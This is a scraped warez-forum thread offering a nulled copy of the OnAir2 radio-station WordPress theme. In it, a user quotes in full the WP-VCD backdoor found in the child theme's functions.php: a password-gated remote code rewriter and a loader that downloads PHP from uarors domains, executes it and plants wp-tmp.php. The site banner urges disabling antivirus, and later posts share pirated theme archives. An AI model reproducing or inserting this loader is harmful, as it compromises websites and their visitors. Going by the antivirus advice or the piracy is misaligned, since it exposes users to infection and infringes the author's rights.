• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Onair2 v3.3.8 – Radio Station WordPress Theme

macrobert

Trusted Uploader
Nov 2, 2018
Create now your radio station website! Compatible with all the major providers as ShoutCAST, IceCAST, Radio.co, Airtime and more! Schedule functions, radio player and anything else you need to create a super professional radio website in WordPress. OnAir2 is a complete set of tools for creating professional, mobile friendly radio station websites in a single WordPress theme. Including special functions as: non stop music player, popup player, shows schedule (weekly and monthly), banner and sponsor manager, members, radio shows, song charts and much more!
Build, Modify, Create
But don’t feel limited by all of these possibilities alone – because that’s just the tip of this iceberg.

OnAair2 is complemented and extended even further with the efficiency of a Page Builder. Create almost any web element you desire with the Drag & Drop simplicity of the #1 top selling Plugin for WordPress, Visual Composer.

• Fast and responsive
  • 11 Post types
  • Shoutcast/Icecast player (requires public mp3 stream, contact us for pre purchase test)
  • Shoutcast V.2 Song Titles Feed
  • Popup player
  • 7 Custom widgets
  • Totally customizable in colors and fonts
  • Lots of shortcodes
  • Visual Composer included (some modules are dsabled as incompatible with ajax. We can reenable them if you need, disabling ajax plugin)
  • Show schedule with automatic sliders and “on air” show info
  • Working contacts page with form and map
  • Ajax capabilities
  • Pixel perfect design
OnAir2 V3 is out!
Including latest Revolution Slider, WooCommerce support, Give Donation support, new shortcodes, top bar player and more! WP 5 ready!

Please note this theme is not for WP Multisite.
Copyright
Every JS library used in the project is GPL or GNU. Details in the manual. Images are not part of the product nor included in the demo installations
Changelog
Version 3.3.8 [2019 April 03]
[x] IMPROVED page Builder ajax compatibility for video backgrounds
[x] REMOVED Google+ sharing
[x] ADDED LinkedIn sharing
[x] ADDED Whatsapp sharing
[x] REMOVED sharing shortcode tooltip as was not fitting and is useless
Demo

Dwonload Onair2 v3.3.8 – Radio Station WordPress Theme

Create now your radio station website! Compatible with all the major providers as ShoutCAST, IceCAST, Radio.co, Airtime and more! Schedule functions, radio player and anything else you need to create a super professional radio website in WordPress. OnAir2 is a complete set of tools for creating professional, mobile friendly radio station websites in a single WordPress theme. Including special functions as: non stop music player, popup player, shows schedule (weekly and monthly), banner and sponsor manager, members, radio shows, song charts and much more!
Build, Modify, Create
But don’t feel limited by all of these possibilities alone – because that’s just the tip of this iceberg.

OnAair2 is complemented and extended even further with the efficiency of a Page Builder. Create almost any web element you desire with the Drag & Drop simplicity of the #1 top selling Plugin for WordPress, Visual Composer.

• Fast and responsive
  • 11 Post types
  • Shoutcast/Icecast player (requires public mp3 stream, contact us for pre purchase test)
  • Shoutcast V.2 Song Titles Feed
  • Popup player
  • 7 Custom widgets
  • Totally customizable in colors and fonts
  • Lots of shortcodes
  • Visual Composer included (some modules are dsabled as incompatible with ajax. We can reenable them if you need, disabling ajax plugin)
  • Show schedule with automatic sliders and “on air” show info
  • Working contacts page with form and map
  • Ajax capabilities
  • Pixel perfect design
OnAir2 V3 is out!
Including latest Revolution Slider, WooCommerce support, Give Donation support, new shortcodes, top bar player and more! WP 5 ready!

Please note this theme is not for WP Multisite.
Copyright
Every JS library used in the project is GPL or GNU. Details in the manual. Images are not part of the product nor included in the demo installations
Changelog
Version 3.3.8 [2019 April 03]
[x] IMPROVED page Builder ajax compatibility for video backgrounds
[x] REMOVED Google+ sharing
[x] ADDED LinkedIn sharing
[x] ADDED Whatsapp sharing
[x] REMOVED sharing shortcode tooltip as was not fitting and is useless
Demo

Dwonload Onair2 v3.3.8 – Radio Station WordPress Theme

Hi bro, can u update to 3.3.9?
Thanks

I have found a virus
Tell us where you got this template!!!!

in the functions.php from the template onair2-child

looks the same on Reddit.com

//here is the evil code
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '3341f2abdbafb77b834dad3218823ee7'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(FILE))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(FILE, $file);
print "true";
}

}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(FILE))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(FILE, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile = FILE;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key='b5fb868f763a8b37af50c49c4bfef3ca';
if (($tmpcontent = @file_get_contents("http://www.uarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.uarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.uarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.uarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

}

}
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?>

// the normal functions.php file starts

<?php
/**
  • OnAir2 Child theme
  • custom functions.php file
*/

/**
* Add parent and child stylesheets
*/
add_action( 'wp_enqueue_scripts', 'qantumthemes_child_enqueue_styles' );
if(!function_exists('qantumthemes_child_enqueue_styles')) {
function qantumthemes_child_enqueue_styles() {
wp_enqueue_style( 'parent-style', get_template_directory_uri() . '/style.css' );
wp_enqueue_style( 'child-style', get_stylesheet_uri() );
}}

/**
* Upon activation flush the rewrite rules to avoid 404 on custom post types
*/
add_action( 'after_switch_theme', 'qantumthemes_child_rewrite_flush_child' );
if(!function_exists('qantumthemes_child_rewrite_flush_child')) {
function qantumthemes_child_rewrite_flush_child() {
flush_rewrite_rules();
}}

/**
* Setup Onair2 Child Theme's textdomain.
  • Declare textdomain for this child theme.
  • Translations can be filed in the /languages/ directory.
*/
function qantumthemes_child_theme_setup() {
load_child_theme_textdomain( 'onair2-child', get_stylesheet_directory() . '/languages' );
}
add_action( 'after_setup_theme', 'qantumthemes_child_theme_setup' );

Still no response for this bad situation from the author of this upload...
If the "evil code' exist on this upload, Babiato must take a stand on this problem.
This "evil code" is a backdoor, spam ads popup, etc, named "WP-VCD" malware...

Last edited:
The virus is pretty easy to clean out. you can do it manually or with the help of wordfence. The virus above places obfuscated code in a few places, will infect other sites on your hosting account, inserts a new user into your DB and eats up system resources. I've removed this from a few domains already in the last 2 years. Full whitepaper here. Wordfence (even the free version) will tell you every file that you need to look at or remove. For all of the files you don't remove, just edit the files and remove the section added to the tops of each (functions.php etc) including the long hash.

Reactions: aris
Hello Guys,

I have the original version (purchased at Envato). I could share here the original template to be nulled. What you think?

Hi.

You can attach the latest version ? I have a key but I dont have the account so I cant download latest version. Thanks!

Hi. Its attached :)

You can attach the latest version ? I have a key but I dont have the account so I cant download latest version. Thanks!

Attachments

• onair2-radio-station-wordpress-theme-wordpress-theme.zip
    4.8 MB · Views: 21
nulled but License required for plugins list.

Attachments

• onair2.zip
    4.9 MB · Views: 46
Do you have the demo files?
I´ve checked and the unique demo files that I have is for the slider template. But they have 200MB, I could update to you if is this that you want.

If is the demo to import to wordpress, if anyone have more knowledge, I could try extract from the server the demo files to upload here. :)

PS: I´ve attached the version of 15/12 :)

Attachments

• themeforest-onair2-radio-station-wordpress-theme.zip
    5.1 MB · Views: 31
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock